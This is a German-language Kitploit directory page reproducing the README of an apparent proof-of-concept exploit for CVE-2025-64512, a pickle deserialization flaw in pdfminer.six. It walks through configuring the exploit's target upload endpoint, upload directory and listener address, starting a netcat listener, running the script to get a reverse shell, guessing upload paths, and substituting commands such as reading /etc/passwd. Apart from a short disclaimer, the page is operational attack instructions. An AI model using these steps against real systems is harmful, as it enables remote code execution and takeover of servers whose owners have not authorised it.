Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-64512 — Exploit für CVE-2025-64512, um eine Reverse-Shell zu erhalten. | Kitploit
Tools/GitHubGitHub/stoic-crawler/cve-2025-64512
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubstoic-crawler/cve-2025-64512

CVE-2025-64512

Exploit für CVE-2025-64512, um eine Reverse-Shell zu erhalten.

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-64512 – pdfminer.six-Deserialisierungs-PoC

Übersicht

Dieser Proof-of-Concept demonstriert eine Schwachstelle in pdfminer.six (CVE-2025-64512), die zur Ausführung beliebiger Befehle führen kann, wenn eine schädliche PDF-Datei verarbeitet wird. Der Exploit verwendet eine präparierte PDF-Datei, die auf ein schädliches, gzip-komprimiertes Python-Pickle verweist. Wenn die verwundbare Anwendung die PDF-Datei parst, lädt sie das Pickle und führt die eingebettete Nutzlast aus.

Der enthaltene PoC ist so konfiguriert, dass er eine Python-Reverse-Shell ausführt, aber die Nutzlast kann durch jeden beliebigen Befehl ersetzt werden.


Voraussetzungen

  • Python 3
  • requests

Installiere die erforderliche Abhängigkeit:

root@kitploit:~
pip install requests

Konfiguration

Bearbeite vor dem Ausführen des Exploits den Konfigurationsabschnitt von exploit.py:

root@kitploit:~
BASE_URL = ""
UPLOAD_DIR = ""
LHOST = ""
LPORT = 4444

BASE_URL

Die URL des verwundbaren Upload-Endpunkts.

Beispiel:

root@kitploit:~
BASE_URL = "http://target/upload.php"

Der Exploit lädt sowohl die schädliche PDF-Datei als auch das komprimierte Pickle auf diesen Endpunkt hoch.


UPLOAD_DIR

Das absolute Verzeichnis auf dem Zielsystem, in dem hochgeladene Dateien gespeichert werden.

Beispiel:

root@kitploit:~
UPLOAD_DIR = "/var/www/html/uploads"

Dieser Pfad wird in die generierte PDF-Datei eingebettet und muss mit dem Speicherort übereinstimmen, von dem die verwundbare Anwendung das hochgeladene Pickle später liest.

Wenn das Upload-Verzeichnis unbekannt ist, ermittle es während der Enumeration. Abhängig von der Anwendung sind folgende Techniken hilfreich:

  • Überprüfen des Anwendungsquellcodes (falls verfügbar)
  • Untersuchen von Fehlermeldungen oder Stack-Traces
  • Suchen nach Konfigurationsdateien
  • Ermitteln, von wo hochgeladene Dateien ausgeliefert werden
  • Aufzählen vorhersehbarer Upload-Speicherorte
  • Fuzzing wahrscheinlicher Upload-Pfade, sofern angemessen

Typische Speicherorte sind:

root@kitploit:~
/var/www/html/uploads
/var/www/uploads
/srv/www/uploads
/opt/application/uploads

Das richtige Verzeichnis hängt vollständig von der Zielanwendung ab.


LHOST

Die IP-Adresse deines Listeners.

Beispiel:

root@kitploit:~
LHOST = "10.10.14.5"

LPORT

Listening-Port für die Reverse-Shell.

Beispiel:

root@kitploit:~
LPORT = 4444

Starte vor dem Ausführen des Exploits einen Listener:

root@kitploit:~
nc -lvnp 4444

Verwendung

Führe den Exploit aus:

root@kitploit:~
python3 exploit.py

Das Skript wird Folgendes tun:

  1. Ein schädliches Pickle erzeugen.
  2. Es in evil.pickle.gz komprimieren.
  3. Eine schädliche PDF-Datei erzeugen, die auf dieses Pickle verweist.
  4. Beide Dateien hochladen.
  5. Die PDF-Verarbeitung auslösen.
  6. Die Nutzlast ausführen, wenn das Ziel verwundbar ist.

Benutzerdefinierte Nutzlasten

Anstelle einer Reverse-Shell kann jeder Betriebssystembefehl ausgeführt werden, indem der Befehl geändert wird, der an Folgendes übergeben wird:

root@kitploit:~
create_pickle_with_cmd(command)

Beispiele sind:

root@kitploit:~
id
whoami
uname -a
cat /etc/passwd

Hinweise

  • Die verwundbare Anwendung muss die hochgeladene PDF-Datei mit einer verwundbaren Version von pdfminer.six verarbeiten.
  • Das hochgeladene Pickle muss weiterhin unter dem Pfad erreichbar sein, auf den in der präparierten PDF-Datei verwiesen wird.
  • Eine erfolgreiche Ausnutzung hängt vom Verarbeitungsablauf des Zielsystems und der Speicherstruktur seiner Dateien ab.

Disclaimer

Dieser Proof-of-Concept dient ausschließlich zu Bildungszwecken, für Sicherheitsforschung und autorisierte Penetrationstests. Verwende ihn nur gegen Systeme, für die du eine ausdrückliche Genehmigung zur Durchführung von Sicherheitstests hast.

Tool herunterladen